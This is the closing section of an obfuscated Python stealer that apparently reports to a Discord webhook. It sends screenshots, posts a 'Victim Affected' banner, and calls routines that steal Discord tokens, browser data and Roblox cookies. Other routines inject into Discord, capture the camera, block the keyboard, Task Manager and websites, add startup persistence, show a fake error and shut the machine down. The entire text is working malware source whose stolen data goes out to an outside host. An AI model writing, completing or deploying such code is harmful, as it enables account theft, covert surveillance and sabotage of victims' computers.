        IPIGIRYFNTWFZMGMMOWQRVGXJQCGXWCSTBAFXIWHYUKRILOIDEHQPFRWVVXOVK.set_footer(text=UCDSLAQDCVXIWSTDCAOPBUTXYGIXDKZLQMPJNHORITFVBQUEVVXRJLUKENJ, icon_url=WMKOWXGKEDEGRKABUHAUCHMYNXNGVEJTPOPQBYTWTSKNSGQUKIFMYFWFBFDDPUDXSZHECPEIUJYJODGCCOM)
        HEVYSHBUSPMJMIBDUMAOQTDGZEISUXJZVYYXPLWWEOSEPKMAUKOFNXPWZILKXLEZJNAUIGPGFZUOTSEDVNNUW = SyncWebhook.from_url(YISFUMZNBSQOHJTWRLDKXATHEJBMDWMKCOJCMOGKOTOIIHFAZCK)
        HEVYSHBUSPMJMIBDUMAOQTDGZEISUXJZVYYXPLWWEOSEPKMAUKOFNXPWZILKXLEZJNAUIGPGFZUOTSEDVNNUW.send(embed=IPIGIRYFNTWFZMGMMOWQRVGXJQCGXWCSTBAFXIWHYUKRILOIDEHQPFRWVVXOVK, file=File(f'{XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN_file_screen}', filename=PDCLNSGSPFMDZUAGPKNYDMEBTTHZMLRHAAAMAZEQBWGDRAGHQBTHJNFOGHCULPYS_file_screen), username=NWILWYNOORHWSHOHRGGENTLTWIIMUCBEHODOWUOFPUKPVFERTENRUNPCJRQQZGJDXBTPFNMPMKKTYCCPETMJZFLJJNTP, avatar_url=WMKOWXGKEDEGRKABUHAUCHMYNXNGVEJTPOPQBYTWTSKNSGQUKIFMYFWFBFDDPUDXSZHECPEIUJYJODGCCOM)
        if os.path.exists(XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN_file_screen):
            os.remove(XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN_file_screen)
    except Exception as e:
        HEVYSHBUSPMJMIBDUMAOQTDGZEISUXJZVYYXPLWWEOSEPKMAUKOFNXPWZILKXLEZJNAUIGPGFZUOTSEDVNNUW = SyncWebhook.from_url(YISFUMZNBSQOHJTWRLDKXATHEJBMDWMKCOJCMOGKOTOIIHFAZCK)
        IPIGIRYFNTWFZMGMMOWQRVGXJQCGXWCSTBAFXIWHYUKRILOIDEHQPFRWVVXOVK = Embed(title=f'Screenshot `{POOQVHPZSIVCSATMQFCRZMVLGIJZFRFFSELPQEWVIWCGYLMGRHOZTGZJBWKDR} \"{WFMGCCEVIPSXGHSXGXFSMCPGDBHDQWYYNNHTLRYLKEVEFCRTGSNAKBDQEKNXBMOHHLYSRDBWMMGVCQTXTNNSWOSJUNP}\"`:', description=f'Impossible to take screenshot.\n**Error:** `{e}`', color=OYLUXSBEMQVAZDUZITFQCBYLXSEUUPLRMCZUJIHCNAYEHDIFYFJYYYEECIOYTUDBBYEEEYOZQRABANOGVIVJGJFUNMSITZFRKGE)
        IPIGIRYFNTWFZMGMMOWQRVGXJQCGXWCSTBAFXIWHYUKRILOIDEHQPFRWVVXOVK.set_footer(text=UCDSLAQDCVXIWSTDCAOPBUTXYGIXDKZLQMPJNHORITFVBQUEVVXRJLUKENJ, icon_url=WMKOWXGKEDEGRKABUHAUCHMYNXNGVEJTPOPQBYTWTSKNSGQUKIFMYFWFBFDDPUDXSZHECPEIUJYJODGCCOM)
        HEVYSHBUSPMJMIBDUMAOQTDGZEISUXJZVYYXPLWWEOSEPKMAUKOFNXPWZILKXLEZJNAUIGPGFZUOTSEDVNNUW.send(embed=IPIGIRYFNTWFZMGMMOWQRVGXJQCGXWCSTBAFXIWHYUKRILOIDEHQPFRWVVXOVK, username=NWILWYNOORHWSHOHRGGENTLTWIIMUCBEHODOWUOFPUKPVFERTENRUNPCJRQQZGJDXBTPFNMPMKKTYCCPETMJZFLJJNTP, avatar_url=WMKOWXGKEDEGRKABUHAUCHMYNXNGVEJTPOPQBYTWTSKNSGQUKIFMYFWFBFDDPUDXSZHECPEIUJYJODGCCOM)
try:
    requests.post(YISFUMZNBSQOHJTWRLDKXATHEJBMDWMKCOJCMOGKOTOIIHFAZCK, json={'content': '****╔═════════════════Victim Affected═════════════════╗****', 'username': NWILWYNOORHWSHOHRGGENTLTWIIMUCBEHODOWUOFPUKPVFERTENRUNPCJRQQZGJDXBTPFNMPMKKTYCCPETMJZFLJJNTP, 'avatar_url': WMKOWXGKEDEGRKABUHAUCHMYNXNGVEJTPOPQBYTWTSKNSGQUKIFMYFWFBFDDPUDXSZHECPEIUJYJODGCCOM})
except:
    pass
try:
    threading.Thread(target=B10ck_K3y).start()
except:
    pass
try:
    threading.Thread(target=B10ck_T45k_M4n4g3r).start()
except:
    pass
try:
    threading.Thread(target=B10ck_W3b5it3).start()
except:
    pass
try:
    threading.Thread(target=St4rtup).start()
except:
    pass
try:
    Sy5t3m_Inf0()
except:
    pass
try:
    Di5c0rd_T0k3n()
except:
    pass
try:
    Di5c0rd_inj3c710n()
except:
    pass
try:
    Br0w53r_5t341()
except:
    pass
try:
    R0b10x_C00ki3()
except:
    pass
try:
    C4m3r4_C4ptur3()
except:
    pass
try:
    Op3n_U53r_Pr0fi13_53tting5()
except:
    pass
try:
    Scr33n5h0t()
except:
    pass
try:
    requests.post(YISFUMZNBSQOHJTWRLDKXATHEJBMDWMKCOJCMOGKOTOIIHFAZCK, json={'content': f'****╚══════════════════{WFMGCCEVIPSXGHSXGXFSMCPGDBHDQWYYNNHTLRYLKEVEFCRTGSNAKBDQEKNXBMOHHLYSRDBWMMGVCQTXTNNSWOSJUNP}══════════════════╝****', 'username': NWILWYNOORHWSHOHRGGENTLTWIIMUCBEHODOWUOFPUKPVFERTENRUNPCJRQQZGJDXBTPFNMPMKKTYCCPETMJZFLJJNTP, 'avatar_url': WMKOWXGKEDEGRKABUHAUCHMYNXNGVEJTPOPQBYTWTSKNSGQUKIFMYFWFBFDDPUDXSZHECPEIUJYJODGCCOM})
except:
    pass
try:
    threading.Thread(target=Sp4m_Opti0ns).start()
except:
    pass
try:
    threading.Thread(target=R3st4rt).start()
except:
    pass
try:
    threading.Thread(target=F4k3_3rr0r).start()
except:
    pass
try:
    threading.Thread(target=Shutd0wn).start()
except:
    pass
Clear()